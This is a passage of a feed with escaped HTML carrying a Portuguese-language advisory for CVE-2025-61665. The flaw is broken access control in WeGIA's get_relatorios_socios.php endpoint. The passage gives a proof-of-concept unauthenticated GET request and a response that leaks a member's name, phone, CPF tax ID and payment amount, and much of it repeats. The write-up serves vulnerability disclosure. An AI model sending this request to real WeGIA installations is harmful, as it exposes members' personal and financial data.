&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;tipo_socio&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tipo_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;operador&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;valor&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tag&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&amp;amp;amp;tipo_pessoa=x&amp;amp;amp;operador=maior_q&amp;amp;amp;valor=&amp;amp;amp;tag=x&amp;amp;amp;status=x HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;response-snippet&amp;#34;&amp;gt;Response (snippet):
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;HTTP/1.1 200 OK
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Date: Sun, 31 Aug 2025 20:00:43 GMT
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Server: Apache/2.4.62 (Debian)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Vary: Accept-Encoding
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 204
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Keep-Alive: timeout=5, max=100
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: Keep-Alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: text/html; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;[{
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;nome&amp;amp;#34;: &amp;amp;#34;Luis Barango&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;telefone&amp;amp;#34;: &amp;amp;#34;(71)98642-1278&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;cpf&amp;amp;#34;: &amp;amp;#34;649.659.320-56&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;valor_periodo&amp;amp;#34;: &amp;amp;#34;5000.00&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;email&amp;amp;#34;: &amp;amp;#34;teste@teste.com&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;tipo&amp;amp;#34;: &amp;amp;#34;F\u00edsica - Mensal - Boleto&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;status&amp;amp;#34;: &amp;amp;#34;Ativo&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;tag&amp;amp;#34;: &amp;amp;#34;Solicitante&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;}]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61665/image.png&amp;#34;
	width=&amp;#34;1534&amp;#34;
	height=&amp;#34;431&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;355&amp;#34;
		data-flex-basis=&amp;#34;854px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61665-controle-de-acesso-quebrado-no-endpoint-get_relatorios_sociosphp&amp;#34;&amp;gt;CVE-2025-61665: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Foi identificada uma vulnerabilidade de Controle de Acesso Quebrado no endpoint &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que atacantes não autenticados acessem diretamente informações pessoais e financeiras sensíveis dos membros sem exigir autenticação ou autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;tipo_socio&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tipo_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;operador&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;valor&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tag&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&amp;amp;amp;tipo_pessoa=x&amp;amp;amp;operador=maior_q&amp;amp;amp;valor=&amp;amp;amp;tag=x&amp;amp;amp;status=x HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;response-snippet&amp;#34;&amp;gt;Response (snippet):
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;HTTP/1.1 200 OK
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Date: Sun, 31 Aug 2025 20:00:43 GMT
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Server: Apache/2.4.62 (Debian)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Vary: Accept-Encoding
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 204
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Keep-Alive: timeout=5, max=100
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: Keep-Alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: text/html; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;[{
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;nome&amp;amp;#34;: &amp;amp;#34;Luis Barango&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;telefone&amp;amp;#34;: &amp;amp;#34;(71)98642-1278&amp;amp;#34;,
